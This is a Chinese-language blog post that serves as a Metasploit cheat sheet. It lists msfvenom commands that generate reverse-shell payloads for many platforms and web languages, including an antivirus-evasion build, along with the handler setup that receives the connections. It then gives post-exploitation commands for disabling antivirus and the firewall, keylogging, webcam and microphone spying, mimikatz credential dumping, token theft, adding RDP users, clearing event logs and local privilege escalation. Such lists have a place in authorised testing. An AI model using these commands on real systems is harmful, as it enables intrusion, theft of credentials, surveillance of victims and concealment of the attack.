使用MSF—进行渗透
使用MSF—进行渗透渗透
使用MSFVENOM生成shellcode--常用的命令
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
编译源payload生成C.利用源payload制作免杀码
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=xxxx LPORT=4444 -b '\x00\' -f c > test2.c
上线会话
#设置windows的payload时候需要选择是需要确认攻击靶机是否为64位,否则默认设置位x86
use exploit/multi/handler
set payload_windows/x64/meterpreter/reverse_tcp
set lhost
set lport
run
在后渗透阶段,成功上线会话首先使用以下命令:
常用模块
1、获取系统运行平台: sysinfo
2、提取系统信息: run scraper
3、查看进行: ps
4、迁移进行: migrate xxxx
5、查看文件: cat 文件
6、查看当前路径: pwd
7、搜索文件: search -d c:\\ -f *.doc
8、其他命令类似于Linux命令: cd, rm, mkdir, rmdir, dir, mv等等
9、上传文件: upload 本机路径 上传目标路径
10、下载文件: download 目标路径 本机路径
11、进程迁移: run post/windows/manage/migrate
12、关闭杀软: run post/windows/manage/killav
13、通过shell来关闭防火墙: netsh advfirewall set allprofiles state off
14、截屏: screenshot
15、查看桌面: run vnc
16、开启3389: run post/windows/manage/enable_rdp
17、提权模块: run post/multi/recon/local_exploit_suggester可以查看当前可以提权的exp
mult/recon/local_exploit_suggester 设置过去的session ID
执行之后会返回可以提权的模块,然后进行调用,设置session提权,成功会返回新的会话
18、运行程序: execute -f notepad.exe 加H可以进行隐藏运行
19、摄像头命令:
音频录制: record_mic
查看摄像头接口: webcam_chat
查看摄像头列表: webcam_list
摄像头视频获取: webcam_stream
20、端口转发: 作用如果目标机器在内网开放3389,外网无法连接,这个时候进行端口转发,利用会话将目标机器3389转发到本地,实现3389远程连接
-L: 要监听的本地主机ip(可选)
-h: 帮助
-l: 要监听的本地端口
-p: 要连接到的远程端口
-r: 要连接的远程主机ip
portfwd add -l 4444 -p 3389 -r 10.211.55.7 // 把目标机10.211.55.7的3389端口转发到本机127.0.0.1的4444端口,直接进行连接本机4444端口即可3389远程连接,同样如果本地两台电脑,另一台电脑直接远程访问开启4444主机的IP+4444可以直接进行连接,,,,注意端口转发并不需要高权限上线就可以直接转发。
21、键盘记录:
keyscan_start: 开启键盘记录功能
keyscan_dump: 显示捕捉的键盘记录信息
keyscan_stop: 停止键盘记录
21、获取hash值: load mimikatz(32位)load kivi(64位)此时调用完成就直接可以使用该模块的命令,但是使用该命令需要拥有系统system权限,同样也可以使用hashdump导出
22、盗取身份令牌: use incognito
list_tokens -u: 列出目标主机用户组可用的令牌,有的话可以直接进行身份切换
list_tokens -g: 列出目标主机用户组可用的令牌,有的话可以直接进行身份切换
更多更多....
uictl 开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
网络摄像头摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
执行执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
清除日志
clearav #清除windows中的应用程序日志、系统日志、安全日志
远程桌面及截屏
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接
getgui命令
run getgui –h #查看帮助
run getgui -e #开启远程桌面
run getgui -u lltest2 -p 123456 #添加用户
run getgui -f 6661 –e #3389端口转发到6661
键盘记录
keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录
shell中出现乱码
输入 chcp 65001
windows7提权常用漏洞
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms13_081_track_popup_menu
windwos service 2003提权常用漏洞
……持续更新

浙公网安备 33010602011771号